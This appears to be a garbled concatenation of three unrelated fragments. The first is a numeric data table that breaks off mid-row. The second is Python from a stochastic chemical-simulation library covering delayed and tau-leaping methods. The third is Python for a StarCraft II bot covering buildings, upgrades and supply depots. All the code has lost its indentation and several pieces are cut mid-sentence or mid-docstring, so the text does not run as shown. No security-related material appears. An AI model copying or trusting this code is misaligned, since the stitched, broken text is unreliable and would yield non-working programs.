[470596, 2, 0, 0, 6, 0.893448],
[472392, 3, 10, 0, 0, 0.730821],
[472500, 2, 3, 4, 1, 0.854758],
[476280, 3, 5, 1, 2, 0.846693],
[480000, 8, 1, 4, 0, 0.716938],
[480200, 3, 0, 2, 4, 0.834781],
[483840, 9, 3, 1, 1, 0.80629],
[486000, 4, 5, 3, 0, 0.753901],
[489888, 5, 7, 0, 1, 0.716337],
[490000, 4, 0, 4, 2, 0.762128],
[491520, 15, 1, 1, 0, 0.708184],
[492075, 0, 9, 2, 0, 6.00789],
[493920, 5, 2, 1, 3, 0.876576],
[496125, 0, 4, 3, 2, 6.01528],
[497664, 11, 5, 0, 0, 0.65836],
[500000, 5, 0, 6, 0, 0.754167],
[500094, 1, 6, 0, 3, 7.06031],
[501760, 11, 0, 1, 2, 0.750931],
[504000, 6, 2, 3, 1, 0.803884],
[504210, 1, 1, 1, 5, 7.06907],
[506250, 1, 4, 5, 0, 7.0764],
[508032, 7, 4, 0, 2, 0.697745],
[510300, 2, 6, 2, 1, 0.924316],
[512000, 12, 0, 3, 0, 0.674464],
[514500, 2, 1, 3, 3, 1.04891],
[516096, 13, 2, 0, 1, 0.692562],
[518400, 8, 4, 2, 0, 0.668166],
[518616, 3, 3, 0, 4, 0.910998],
[524288, 19, 0, 0, 0, 0.571635],
[524880, 4, 8, 1, 0, 0.780152],
[525000, 3, 1, 5, 1, 0.978398],
[526848, 9, 1, 0, 3, 0.922844],
[529200, 4, 3, 2, 2, 0.842967],
[531441, 0, 12, 0, 0, 6.20779],
[535815, 0, 7, 1, 2, 6.21667],
[537600, 10, 1, 2, 1, 0.857613],
[537824, 5, 0, 0, 5, 0.899876],
[540000, 5, 3, 4, 0, 0.758291],
[540225, 0, 2, 2, 4, 7.60709],
[544320, 6, 5, 1, 1, 0.877678],
[546750, 1, 7, 3, 0, 7.5993],
[546875, 0, 0, 7, 1, 6.34296],
[548800, 6, 0, 2, 3, 0.84308],
[551124, 2, 9, 0, 1, 0.977769],
[551250, 1, 2, 4, 2, 6.34616],
[552960, 12, 3, 1, 0, 0.762534],
[555660, 2, 4, 1, 3, 1.08122],
[559872, 8, 7, 0, 0, 0.718067],
[560000, 7, 0, 4, 1, 0.788241],
[562500, 2, 2, 6, 0, 1.06725],
[564480, 8, 2, 1, 2, 0.894466],
[567000, 3, 4, 3, 1, 0.927108],
[571536, 4, 6, 0, 2, 0.918767],
[573440, 14, 0, 1, 1, 0.789791],
[576000, 9, 2, 3, 0, 0.880239],
[576240, 4, 1, 1, 4, 1.11588],
[580608, 10, 4, 0, 1, 0.796861],
[583200, 5, 6, 2, 0, 0.833449],
[583443, 0, 5, 0, 4, 6.43371],
[588000, 5, 1, 3, 2, 1.00023],
[588245, 0, 0, 1, 6, 6.43621],
[589824, 16, 2, 0, 0, 0.729085],
[590490, 1, 10, 1, 0, 8.54966],
[590625, 0, 3, 5, 1, 7.9221],
[592704, 6, 3, 0, 3, 0.927415],
[595350, 1, 5, 2, 2, 7.93371],
[600000, 6, 1, 5, 0, 0.939427],
[600250, 1, 0, 3, 4, 7.96864],
[602112, 12, 1, 0, 2, 0.884506],
[604800, 7, 3, 2, 1, 0.868979],
[605052, 2, 2, 0, 5, 1.21321],
[607500, 2, 5, 4, 0, 1.0272],
[612360, 3, 7, 1, 1, 1.08049],
[612500, 2, 0, 5, 2, 1.12267],
[614400, 13, 1, 2, 0, 0.820382],
[614656, 8, 0, 0, 4, 0.922057],
[617400, 3, 2, 2, 3, 1.13522],
[622080, 9, 5, 1, 0, 0.993679],
[625000, 3, 0, 7, 0, 0.987692],
[627200, 9, 0, 2, 2, 0.944379],
[629856, 5, 9, 0, 0, 0.862795],
[630000, 4, 2, 4, 1, 1.03049],
[635040, 5, 4, 1, 2, 0.991658],
[637875, 0, 6, 3, 1, 7.03471],
[640000, 10, 0, 4, 0, 0.859725],
[642978, 1, 8, 0, 2, 7.39767],
[643125, 0, 1, 4, 3, 7.37907],
[645120, 11, 2, 1, 1, 1.00396],
[648000, 6, 4, 3, 0, 0.871443],
[648270, 1, 3, 1, 4, 7.22079],
[653184, 7, 6, 0, 1, 0.950992],
[655360, 17, 0, 1, 0, 0.851658],
[656100, 2, 8, 2, 0, 1.02841],
[656250, 1, 1, 6, 1, 6.82084],
[658560, 7, 1, 1, 3, 1.16936],
[661500, 2, 3, 3, 2, 1.22952],
[663552, 13, 4, 0, 0, 0.750628],
[666792, 3, 5, 0, 3, 1.14195],
[672000, 8, 1, 3, 1, 1.10406],
[672280, 3, 0, 1, 5, 1.3236],
[675000, 3, 3, 5, 0, 1.10877],
[677376, 9, 3, 0, 2, 1.03022],
[680400, 4, 5, 2, 1, 1.0823],
[686000, 4, 0, 3, 3, 1.1701],
[688128, 15, 1, 0, 1, 0.965973],
[688905, 0, 9, 1, 1, | |
at ~15 species).
- *IsOnlyLastTimepoint* [default = False] (boolean)
- *critical_reactions* [default = [] ] (list) ONLY for the tau-leaping method where the user can pre-define reactions that are "critical". Critical reactions can fire only once per time step.
        - *reaction_orders* [default = []] (list) ONLY for the tau-leaping method
        - *species_HORs* [default = []] (list) ONLY for the tau-leaping method
- *species_max_influence* [default = []] (list) ONLY for the tau-leaping method
- *quiet* [default = False] suppress print statements
"""
if self._IsQuiet:
quiet = True
if species_selection and isinstance(species_selection,str):
species_selection = [species_selection]
if species_selection and isinstance(species_selection,list):
for s_id in species_selection:
assert s_id in self.SSA.species_names, "Species {0} is not in the model or species selection".format(s_id)
self._IsTrackPropensities = IsTrackPropensities
if rate_selection and isinstance(rate_selection,str):
rate_selection = [rate_selection]
self._IsTrackPropensities = True
if rate_selection and isinstance(rate_selection,list):
for r_id in rate_selection:
assert r_id in self.SSA.rate_names, "Reaction {0} is not in the model or reaction selection".format(r_id)
self._IsTrackPropensities = True
self._IsOnlyLastTimepoint = IsOnlyLastTimepoint
if mode != False:
self.Mode(sim_mode = mode)
self._IsModeSetByUser = False
elif mode == False and self.sim_mode != 'steps' and not self._IsModeSetByUser:
self.Mode('steps')
if end != False:
if type(end) in [int,float,np.float64,np.float32]:
self.sim_end = end
else:
print("*** WARNING ***: 'end' should be an integer or float\n 1000 is used by default")
self.sim_end = 1000
self._IsEndSetByUser=False
elif end == False and self.sim_end != 1000 and not self._IsEndSetByUser:
self.sim_end = 1000
self.data_stochsim = IntegrationStochasticDataObj()
self.data_stochsim_grid = RegularGridDataObj()
if method != False:
self.Method(method)
self._MethodSetBy = "DoStochSim"
elif method == False and self.sim_method_name != "Direct" and self._MethodSetBy == "DoStochSim":
self.Method("Direct")
# If DoStochSim not called from DoDelayedStochSim, the method should never be delayed.
if (self._IsDelayedMethod or self._IsSingleMoleculeMethod) and self._MethodSetBy != "Script": # 08-01-2014
print("*** WARNING ***: ({0:s}) was selected. Switching to the direct method.".format(self.sim_method_name))
self.Method('Direct')
self._MethodSetBy = "DoStochSim"
if reaction_orders != False:
if not quiet:
print("Info: reaction orders {0} replaced with {1}".format(self.SSA.parse.reaction_orders, reaction_orders))
self.SSA.parse.reaction_orders = reaction_orders
if species_HORs != False:
self.SSA.parse.species_HORs = species_HORs
if not quiet:
print("Info: species HORs {0} replaced with {1}".format(self.SSA.parse.species_HORs, species_HORs))
if species_max_influence != False:
self.SSA.parse.species_max_influence = species_max_influence
if not quiet:
print("Info: species max influence {0} replaced with {1}".format(self.SSA.parse.species_max_influence, species_max_influence))
if trajectories != False:
self.Trajectories(trajectories)
self._IsTrajectoriesSetByUser = False
elif trajectories == False and self.sim_trajectories != 1 and not self._IsTrajectoriesSetByUser:
self.Trajectories(1)
self._IsFixedIntervalMethod = False
self.HAS_AVERAGE = False
if self._IsDeletePreviousSimulationData:
self.DeleteTempfiles() # Delete '.dat' files
if not quiet:
if self.sim_trajectories == 1:
print("Info: 1 trajectory is generated")
else:
print("Info: {0:d} trajectories are generated".format(self.sim_trajectories))
print("Info: Time simulation output of the trajectories is stored at {0:s} in directory: {1:s}".format(self.model_file[:-4]+'(trajectory).dat',self.temp_dir))
progressBar = Progress_bar(cycles_total = self.sim_trajectories, done_msg = 'time') ##Progress bar addition## Shows Simulation time afterwards
for self._current_trajectory in range(1,self.sim_trajectories+1):
if self.sim_trajectories > 1:
IsStatusBar = False
else:
IsStatusBar = True
t1 = time.time()
if self.sim_mode.lower() == 'time':
self.settings = SSASettings(x_matrix=self.SSA.X_matrixinit,timesteps=10**50,starttime=0,endtime=self.sim_end, track_propensities=self._IsTrackPropensities, species_selection=species_selection,rate_selection = rate_selection,last_timepoint=IsOnlyLastTimepoint,seed = self._IsSeed,quiet = quiet)
elif self.sim_mode.lower() == 'steps':
self.settings = SSASettings(x_matrix=self.SSA.X_matrixinit,timesteps=self.sim_end,starttime=0,endtime=10**50, track_propensities=self._IsTrackPropensities, species_selection=species_selection,rate_selection = rate_selection,last_timepoint=IsOnlyLastTimepoint,seed = self._IsSeed,quiet = quiet)
else:
print("*** WARNING ***: Simulation mode should be 'time' or 'steps'. Steps is done by default")
self.settings = SSASettings(x_matrix=self.SSA.X_matrixinit,timesteps=self.sim_end,starttime=0,endtime=10**50, track_propensities=self._IsTrackPropensities, species_selection=species_selection,rate_selection = rate_selection,last_timepoint=IsOnlyLastTimepoint,seed = self._IsSeed,quiet = quiet)
if self.sim_method_name.lower() == "tauleaping":
self.SSA.Execute(self.settings,IsStatusBar,epsilon,critical_reactions)
else:
self.SSA.Execute(self.settings,IsStatusBar)
self.data_stochsim = IntegrationStochasticDataObj()
self.FillDataStochsim()
if self.sim_trajectories == 1 and not quiet:
print("Info: Number of time steps {0:d} End time {1}".format(self.SSA.timestep,self.SSA.sim_t))
elif self.sim_trajectories > 1:
self.DumpTrajectoryData(self._current_trajectory)
progressBar.update(quiet=quiet) #Progress bar addition, only for multiple trajectories
self._IsSimulationDone = True
self.sim_trajectories_done = copy.copy(self.sim_trajectories)
try:
self.plot = Analysis.DoPlotting(self.data_stochsim.species_labels,self.sim_rates_tracked,self.plot.plotnum,quiet)
except:
self.plot = Analysis.DoPlotting(self.data_stochsim.species_labels,self.sim_rates_tracked,quiet=quiet)
if IsStatusBar:
t2 = time.time()
self.simulation_time = t2-t1
if not quiet:
print("Info: Simulation time {0:1.5f}".format(self.simulation_time))
else:
self.simulation_time = progressBar.end_time - progressBar.t1
if IsOnlyLastTimepoint and not quiet:
print('Info: not enough data points (are stored) to determine statistics.')
def SetDelayParameters(self, delay_distributions, nonconsuming_reactions = None):
"""
Assign the delay input to the SSA.
Input:
- *delay_distributions* (dict) with reaction name (or index) as key and distribution as value.
- *nonconsuming_reactions* (list) [default = None]
All reactions are assumed to be consuming reactions. Consuming and nonconsuming reactions are defined according to <NAME> (2007), "Exact stochastic simulation of coupled chemical reactions with delays", J.Phys. Chem. 126:124108.
Example: SetDelayParameters(delay_distributions = {'R1':('fixed',3), 'R2':('gamma',5,1)}, nonconsuming_reactions = ['R2'])
- Reaction 'R1' will get a delay of 3 seconds and reaction 'R2' a gamma distributed delay with shape=5 and scale=1.
- Reaction 'R1' will be a consuming reaction, and 'R2' a nonconsuming reaction.
Value of *delay_distributions* can be any distribution of numpy.random, e.g.:
- ('gamma', p1,p2) = np.random.gamma(p1,p2) #Where p1 is the shape parameter and p2 the scale parameter.
- ('exponential', p1) = np.random.exponential(p1) #Where p1 is the scale parameter (NOT the rate).
        - ('uniform', lower, upper) = np.random.uniform(lower,upper) #Where lower and upper are the interval bounds.
"""
# Parse the distribution dictionary to two dictionaries. These have reaction indices as keys and values are resp. distribution functions and parameter lists.
self.delay_distributions, self.delay_distr_parameters = ParseDistributions(delay_distributions, self.SSA.rate_names) # use all rate names, because this is done before the simulation starts
delayed_reactions = list(self.delay_distributions)
if nonconsuming_reactions == None: # ==None to recognize 0 as reaction index.
self.delayed_nonconsuming = []
self.delayed_consuming = delayed_reactions # All reactions consuming
else: # Nonconsuming reactions supplied
self.delayed_nonconsuming = convertInput2Indices(nonconsuming_reactions, self.SSA.rate_names)
self.delayed_nonconsuming = [r for r in self.delayed_nonconsuming if r in delayed_reactions] # Selects nonconsuming reactions that have a delay distribution.
self.delayed_consuming = list(set(delayed_reactions) - set(self.delayed_nonconsuming)) # Selects consuming reactions by: all_reaction - nonconsuming
self.HAS_DELAY_PARAMETERS = True
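    # Illustrative (assumed) workflow with a hypothetical model instance 'smod':
    #     smod.SetDelayParameters( {'R1': ('fixed', 3), 'R2': ('gamma', 5, 1)},
    #                              nonconsuming_reactions=['R2'] )
    #     smod.DoDelayedStochSim( end=1000, mode='steps', trajectories=3 )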
def DoDelayedStochSim(self, end=False, mode=False, method=False, trajectories=False, IsTrackPropensities=False, rate_selection = None, species_selection = None, IsOnlyLastTimepoint = False,quiet=False):
"""
Run a stochastic simulation with delayed reactions until `end` is reached. This can be either time steps or end time (which could be a *HUGE* number of steps).
Input:
- *end* [default=1000] simulation end (steps or time)
- *mode* [default='steps'] simulation mode, can be one of: ['steps','time']
- *method* [default='DelayedDirect'] stochastic algorithm ['DelayedDirect', 'DelayedNRM']
- *trajectories* [default = 1]
- *IsTrackPropensities* [default = False]
        - *rate_selection* [default = None] List of names of rates to store. This saves memory space and prevents Memory Errors when propensities are tracked
- *species_selection* [default = None] List of names of species to store. This saves memory space and prevents Memory Errors (occurring at ~15 species).
- *IsOnlyLastTimepoint* [default = False]
- *quiet* [default = False] suppress print statements
"""
if self._IsQuiet:
quiet = True
if method != False:
self.Method(method)
self._MethodSetBy = "DoStochSim"
elif self._MethodSetBy == "DoStochSim" and self.sim_method_name != "DelayedDirectMethod":
self.Method("DelayedDirect") # Default
if not self._IsDelayedMethod:
print("*** WARNING ***: an invalid method ({0}) was selected. Switching to the Delayed Direct Method.".format(self.sim_method_name))
self.Method('DelayedDirect') # = Default delayed method
if self.HAS_DELAY_PARAMETERS:
# Pass delay parameters to delayed SSA implementation.
self.SSA.distr_functions = copy.copy(self.delay_distributions)
self.SSA.distr_parameters = copy.copy(self.delay_distr_parameters)
self.SSA.reactions_Consuming = copy.copy(self.delayed_consuming)
self.SSA.reactions_NonConsuming = copy.copy(self.delayed_nonconsuming)
else:
raise AttributeError("No delay parameters have been set for the model '{0:s}'. First use the function .SetDelayParameters().".format(self.model_file)) #7-1-2014 exit if no delay parameters
# Specify that delayed method is set by this script. Prevents DoStochSim to select other method.
temp_MethodSetBy = self._MethodSetBy #Either "User" or "DoStochSim"
self._MethodSetBy = "Script"
#Perform Stochastic Simulation with given settings and method selected in
self.DoStochSim(end=end, mode=mode, method=False, trajectories=trajectories, IsTrackPropensities=IsTrackPropensities, rate_selection = rate_selection, species_selection = species_selection, IsOnlyLastTimepoint = IsOnlyLastTimepoint,quiet=quiet)
# Reset to original value
self._MethodSetBy = temp_MethodSetBy
if IsOnlyLastTimepoint and not quiet:
print('Info: not enough data points (are stored) to determine statistics.')
def SetPutativeReactionTimes(self, distributions):
"""
Sets the single molecule putative reaction times distribution.
Input:
- *distributions* (dict) with reaction name (or index) as key and distribution as value.
Value of *distributions* can be any distribution of numpy.random, e.g.:
- ('gamma', p1,p2) = | |
fac in self.structures(UnitTypeId.FACTORYFLYING).idle:
possible_land_positions_offset = sorted(
(Point2((x, y)) for x in range(-10, 10) for y in range(-10, 10)),
key=lambda point: point.x ** 2 + point.y ** 2,
)
offset_point: Point2 = Point2((-0.5, -0.5))
possible_land_positions = (fac.position.rounded + offset_point + p for p in possible_land_positions_offset)
for target_land_position in possible_land_positions:
if (
(await self.can_place(UnitTypeId.FACTORY, target_land_position))
and (await self.can_place(UnitTypeId.SUPPLYDEPOT, target_land_position + Point2((2.5, -0.5))))
):
fac(AbilityId.LAND, target_land_position)
break
"""
# Iterate through all landed starports, build reactors
for sp in self.structures(UnitTypeId.STARPORT).ready.idle:
if not sp.has_add_on:
if self.can_afford(UnitTypeId.STARPORTREACTOR):
addon_position: Point2 = sp.position + Point2((2.5, -0.5))
if (await self.can_place(UnitTypeId.SUPPLYDEPOT, addon_position)):
sp.build(UnitTypeId.STARPORTREACTOR)
else:
sp(AbilityId.LIFT) # Lift if addon will not fit
"""
# Iterate through all landed starports
for sp in self.structures(UnitTypeId.STARPORT).ready.idle:
if not sp.has_add_on and not self.enemy_units.closer_than(8, sp.position):
addon_position: Point2 = sp.position + Point2((2.5, -0.5))
if not (await self.can_place(UnitTypeId.SUPPLYDEPOT, addon_position)): sp(AbilityId.LIFT) # if an addon won't fit, lift
elif self.already_pending(UnitTypeId.STARPORTTECHLAB) + self.structures(UnitTypeId.STARPORTTECHLAB).ready.amount < 1: # no tech lab exists
if (
self.can_afford(UnitTypeId.STARPORTTECHLAB)
and len(self.units.of_type({MEDIVAC})) >= 1 # at least one medivac exists
):
sp.build(UnitTypeId.STARPORTTECHLAB) # build tech lab
else:
if self.can_afford(UnitTypeId.STARPORTREACTOR): sp.build(UnitTypeId.STARPORTREACTOR) # build reactor
# Find a spot for lifted starports to land
for sp in self.structures(UnitTypeId.STARPORTFLYING).idle:
possible_land_positions_offset = sorted(
(Point2((x, y)) for x in range(-10, 10) for y in range(-10, 10)),
key=lambda point: point.x ** 2 + point.y ** 2,
)
offset_point: Point2 = Point2((-0.5, -0.5))
possible_land_positions = (sp.position.rounded + offset_point + p for p in possible_land_positions_offset)
for target_land_position in possible_land_positions:
if (
(await self.can_place(UnitTypeId.STARPORT, target_land_position))
and (await self.can_place(UnitTypeId.SUPPLYDEPOT, target_land_position + Point2((2.5, -0.5))))
):
sp(AbilityId.LAND, target_land_position)
break
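        # The landing search above sorts candidate offsets by squared distance from the lifted
        # starport, so the closest legal position that also leaves room for a 2x2 addon (checked
        # via the SUPPLYDEPOT footprint) is picked first.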
async def build_refineries(self):
if (
self.already_pending(UnitTypeId.REFINERY) + self.structures(UnitTypeId.REFINERY).ready.amount < self.get_ideal_building_count("REFINERY")
and self.can_afford(UnitTypeId.REFINERY)
):
for cc in self.townhalls:
geysers = self.vespene_geyser.closer_than(10, cc)
for geyser in geysers:
if self.gas_buildings.filter(lambda unit: unit.distance_to(geyser) < 1): # refinery already exists here
continue
worker: Unit = self.select_build_worker(geyser)
if worker is None:
continue
worker.build_gas(geyser)
break # so that it doesn't queue two refineries at once
async def build_depots(self):
depot_r1 = self.depot_r1 # TODO clean this up
depot_r2 = self.depot_r2
#print(depot_r1)
#print(depot_r2)
# self.depot_placement_positions is a set of two positions to build depots at (near the ramp)
if ( # if we want to build a depot...
self.can_afford(UnitTypeId.SUPPLYDEPOT)
and self.already_pending(UnitTypeId.SUPPLYDEPOT) < self.get_simultaneous_depot_count()
and self.supply_cap < 200
):
# elif len(self.depot_placement_positions) == 2:
if (
not self.structures.of_type({SUPPLYDEPOT, SUPPLYDEPOTLOWERED}) # no supply depots exist
or not depot_r1.closest(self.structures.of_type({SUPPLYDEPOT, SUPPLYDEPOTLOWERED})).distance_to(depot_r1) < 1 # not already a depot in this spot
):
# target_depot_location: Point2 = self.depot_placement_positions.pop() # pop location from list
target_depot_location = depot_r1
w = self.workers.collecting.closest_to(target_depot_location) # get nearby worker
w.build(UnitTypeId.SUPPLYDEPOT, target_depot_location) # nearby worker build depot at target location
print('just tried to build 1st depot')
elif not depot_r2.closest(self.structures.of_type({SUPPLYDEPOT, SUPPLYDEPOTLOWERED})).distance_to(depot_r2) < 1: # same for second depot
if ( # wall fast if being cheesed, otherwise wait until natural is started
self.beingcheesed
or (self.townhalls.amount >= self.get_ideal_building_count('COMMANDCENTER') and self.supply_army + self.supply_workers >= 21)
):
# self.main_base_ramp.corner_depots[0]
# target_depot_location: Point2 = self.depot_placement_positions.pop() # pop location from list
target_depot_location = depot_r2
w = self.workers.gathering.closest_to(target_depot_location) # get nearby worker TODO: switched collecting to gathering, will that fix bug?
w.build(UnitTypeId.SUPPLYDEPOT, target_depot_location) # nearby worker build depot at target location
print('just tried to build 2nd depot')
elif len(self.depot_placement_positions) == 0: # other depots can go wherever
depot_pos = await self.find_placement(UnitTypeId.BARRACKS, near=self.townhalls.random.position.towards(self.game_info.map_center, 8))
w = self.workers.collecting.closest_to(depot_pos)
w.build(UnitTypeId.SUPPLYDEPOT, depot_pos)
# print('just tried to build another depot')
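# depot_r1 / depot_r2 are assumed to be precomputed elsewhere (see the TODO above);
# in python-sc2 the two ramp-wall depot spots are usually taken from the main base
# ramp once during startup, e.g. (sketch only, not the original code):
#
#     corner_depots = list(self.main_base_ramp.corner_depots)
#     self.depot_r1, self.depot_r2 = corner_depots[0], corner_depots[1]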
async def build_upgrade_buildings(self):
# Engineering Bays
if (
self.tech_requirement_progress(UnitTypeId.ENGINEERINGBAY) == 1
and self.already_pending(UnitTypeId.ENGINEERINGBAY) + self.structures(UnitTypeId.ENGINEERINGBAY).ready.amount < self.get_ideal_building_count("ENGINEERINGBAY")
):
if self.can_afford(UnitTypeId.ENGINEERINGBAY):
ebay_pos = await self.find_placement(UnitTypeId.ENGINEERINGBAY, near=self.townhalls.first.position.towards(self.game_info.map_center, -12))
w = self.workers.collecting.closest_to(ebay_pos)
w.build(UnitTypeId.ENGINEERINGBAY, ebay_pos)
#await self.build(UnitTypeId.ENGINEERINGBAY, near=self.townhalls.first.position.towards(self.game_info.map_center, -12))
# Armory
elif (
self.already_pending_upgrade(UpgradeId.TERRANINFANTRYWEAPONSLEVEL1) > 0.54
and self.already_pending(UnitTypeId.ENGINEERINGBAY) + self.structures(UnitTypeId.ENGINEERINGBAY).ready.amount > 1
and self.already_pending(UnitTypeId.ARMORY) + self.structures(UnitTypeId.ARMORY).ready.amount < 1
):
if self.can_afford(UnitTypeId.ARMORY):
armory_pos = await self.find_placement(UnitTypeId.ARMORY, near=self.townhalls.first.position.towards(self.game_info.map_center, -12))
w = self.workers.collecting.closest_to(armory_pos)
w.build(UnitTypeId.ARMORY, armory_pos)
#await self.build(UnitTypeId.ARMORY, near=self.townhalls.first.position.towards(self.game_info.map_center, -12))
async def build_missile_turrets(self):
# TODO: only build forward turret if there are no enemy ground units nearby
fwd_turret_pos = self.sorted_expo_locations[1].towards(self.game_info.map_center, 16)
if (
self.tech_requirement_progress(UnitTypeId.MISSILETURRET) == 1
and not self.already_pending(UnitTypeId.MISSILETURRET)
and not self.structures(UnitTypeId.MISSILETURRET).closer_than(4, fwd_turret_pos)
):
w = self.workers.collecting.closest_to(fwd_turret_pos)
w.build(UnitTypeId.MISSILETURRET, fwd_turret_pos)
#await self.build(UnitTypeId.MISSILETURRET, fwd_turret_pos)
elif (
self.tech_requirement_progress(UnitTypeId.MISSILETURRET) == 1
and self.already_pending(UnitTypeId.ENGINEERINGBAY) + self.structures(UnitTypeId.ENGINEERINGBAY).ready.amount > 1 # more than 1 ebay exists or in production
and self.already_pending(UnitTypeId.MISSILETURRET) + self.structures(UnitTypeId.MISSILETURRET).ready.amount < (self.townhalls.amount + 1) # less than (th + 1) missile turrets
and self.already_pending(UnitTypeId.MISSILETURRET) - self.structures(UnitTypeId.MISSILETURRET).not_ready.amount < 1 # no more than 1 queued but not started
):
for cc in self.townhalls:
if (
not self.structures(UnitTypeId.MISSILETURRET).closer_than(9, cc.position) # this CC does not have a nearby turret
and self.can_afford(UnitTypeId.MISSILETURRET)
):
turret_pos = await self.find_placement(UnitTypeId.MISSILETURRET, near=cc.position.towards(self.game_info.map_center, -4))
w = self.workers.collecting.closest_to(turret_pos)
w.build(UnitTypeId.MISSILETURRET, turret_pos)
#await self.build(UnitTypeId.MISSILETURRET, near=cc.position.towards(self.game_info.map_center, -4))
async def upgrade_command_center(self):
# returns "cant_afford" when an orbital upgrade had to be skipped due to resources
for cc in self.structures(UnitTypeId.COMMANDCENTER).ready.idle:
abilities = await self.get_available_abilities(cc)
if AbilityId.UPGRADETOORBITAL_ORBITALCOMMAND in abilities:
if self.can_afford(AbilityId.UPGRADETOORBITAL_ORBITALCOMMAND):
cc(AbilityId.UPGRADETOORBITAL_ORBITALCOMMAND)
else:
return("cant_afford") # would otherwise do
async def manage_orbital_energy(self):
for cc in self.structures(UnitTypeId.ORBITALCOMMAND).ready:
abilities = await self.get_available_abilities(cc)
if AbilityId.SCANNERSWEEP_SCAN in abilities and cc.energy >= 50: # TODO: scan
pass
if AbilityId.CALLDOWNMULE_CALLDOWNMULE in abilities and cc.energy >= 50: # TODO: save energy for scans
cc(AbilityId.CALLDOWNMULE_CALLDOWNMULE, self.get_mule_target())
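# get_mule_target() is defined elsewhere in this bot; a minimal sketch of the usual
# implementation (drop the MULE on the richest mineral patch near a ready townhall)
# could look like this; it is an assumption, not the original method:
#
#     def get_mule_target(self) -> Unit:
#         th = self.townhalls.ready.random
#         patches = self.mineral_field.closer_than(10, th)
#         return max(patches, key=lambda mf: mf.mineral_contents)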
async def finish_constructing_buildings(self):
#if self.units.structure.not_ready.amount > constructingscvcount:
for building in self.structures.not_ready: # for each unfinished building
if "TechLab" in building.name or "Reactor" in building.name: continue # ignore addons
isbuilding = False
for worker in self.workers: # iterate through every worker
if worker.is_constructing_scv and worker.distance_to(building) < 3.1: # this worker is constructing this building
isbuilding = True
break # stop looking through workers
if not isbuilding: # if no workers are constructing this unfinished building
if self.enemy_units.closer_than(8, building):
building(AbilityId.CANCEL_BUILDINPROGRESS)
elif self.workers:
newworker = self.workers.gathering.random
newworker.smart(building)
#await self.do_actions(newworker(SMART,building))
"""
if self.units.structure.not_ready.amount > self.units(SCV).is_constructing_scv.amount: # if there is an unfinished building
print("---------> a building is not finished !")
for building in self.units.structure.not_ready: # for each unfinished building
if not self.units(SCV).is_constructing_scv.closer_than(2,building): # if this building is not being constructed
ws = self.workers.gathering
w = ws.random
await self.do_actions(w(SMART,building))
"""
async def repair_damaged_buildings(self):
for building in self.structures.ready:
if building.health_percentage < 1 and building.health_percentage > 0.05:
repairingworkers = 0
for worker in self.workers.closer_than(3, building.position):
if worker.is_repairing and worker.order_target == building.tag:
repairingworkers += 1
if repairingworkers < 3 and self.workers.gathering:
self.workers.gathering.closest_to(building.position).smart(building)
async def research_upgrades(self):
for ebay in self.structures(UnitTypeId.ENGINEERINGBAY).ready.idle:
abilities = await self.get_available_abilities(ebay)
if AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYWEAPONSLEVEL1 in abilities and self.can_afford(AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYWEAPONSLEVEL1):
ebay.research(UpgradeId.TERRANINFANTRYWEAPONSLEVEL1)
elif AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYWEAPONSLEVEL2 in abilities and self.can_afford(AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYWEAPONSLEVEL2):
ebay.research(UpgradeId.TERRANINFANTRYWEAPONSLEVEL2)
elif AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYWEAPONSLEVEL3 in abilities and self.can_afford(AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYWEAPONSLEVEL3):
ebay.research(UpgradeId.TERRANINFANTRYWEAPONSLEVEL3)
elif AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYARMORLEVEL1 in abilities and self.can_afford(AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYARMORLEVEL1):
ebay.research(UpgradeId.TERRANINFANTRYARMORSLEVEL1)
elif AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYARMORLEVEL2 in abilities and self.can_afford(AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYARMORLEVEL2):
ebay.research(UpgradeId.TERRANINFANTRYARMORSLEVEL2)
elif AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYARMORLEVEL3 in abilities and self.can_afford(AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYARMORLEVEL3):
ebay.research(UpgradeId.TERRANINFANTRYARMORSLEVEL3)
for raxlab in self.structures(UnitTypeId.BARRACKSTECHLAB).ready.idle:
abilities = await self.get_available_abilities(raxlab)
if ( # Stimpack
AbilityId.BARRACKSTECHLABRESEARCH_STIMPACK in abilities
and self.can_afford(AbilityId.BARRACKSTECHLABRESEARCH_STIMPACK)
and self.already_pending(UnitTypeId.FACTORY) + self.structures(UnitTypeId.FACTORY).ready.amount > 0
):
raxlab.research(UpgradeId.STIMPACK)
elif ( # Combat Shield
AbilityId.RESEARCH_COMBATSHIELD in abilities
and self.can_afford(AbilityId.RESEARCH_COMBATSHIELD)
and self.already_pending(UnitTypeId.FACTORY) + self.structures(UnitTypeId.FACTORY).ready.amount > 0
):
raxlab.research(UpgradeId.SHIELDWALL) # why the hell is it UpgradeId.SHIELDWALL while UpgradeId.COMBATSHIELD is an entirely different thing?
elif ( # Concussive Shells
AbilityId.RESEARCH_CONCUSSIVESHELLS in abilities
and self.can_afford(AbilityId.BARRACKSTECHLABRESEARCH_STIMPACK)
and self.can_afford(AbilityId.RESEARCH_CONCUSSIVESHELLS)
):
raxlab.research(UpgradeId.PUNISHERGRENADES)
async def raise_lower_depots(self):
prox_threshold = 15
# depots will raise when the closest non-flying enemy unit is closer than this threshold, and lower again once enemies move away
lowered_depots = self.structures.of_type(SUPPLYDEPOTLOWERED)
raised_depots = self.structures.of_type(SUPPLYDEPOT)
# if lowered_depots: # consider raising them
for depot in lowered_depots:
if self.enemy_units.filter(lambda u: not u.is_flying):
closest_enemy = self.enemy_units.filter(lambda u: not u.is_flying).closest_to(depot) # the non-flying enemy unit that is closest to the depot
if closest_enemy and depot.distance_to(closest_enemy) < prox_threshold: # enemies getting close
depot(AbilityId.MORPH_SUPPLYDEPOT_RAISE)
for depot in raised_depots:
if self.enemy_units.filter(lambda u: not u.is_flying):
closest_enemy = self.enemy_units.filter(lambda u: not u.is_flying).closest_to(depot)
#closest_enemy = Units([u for u in self.enemy_units if not u.is_flying]).closest_to(depot)
if closest_enemy and depot.distance_to(closest_enemy) > prox_threshold: # enemies getting farther away
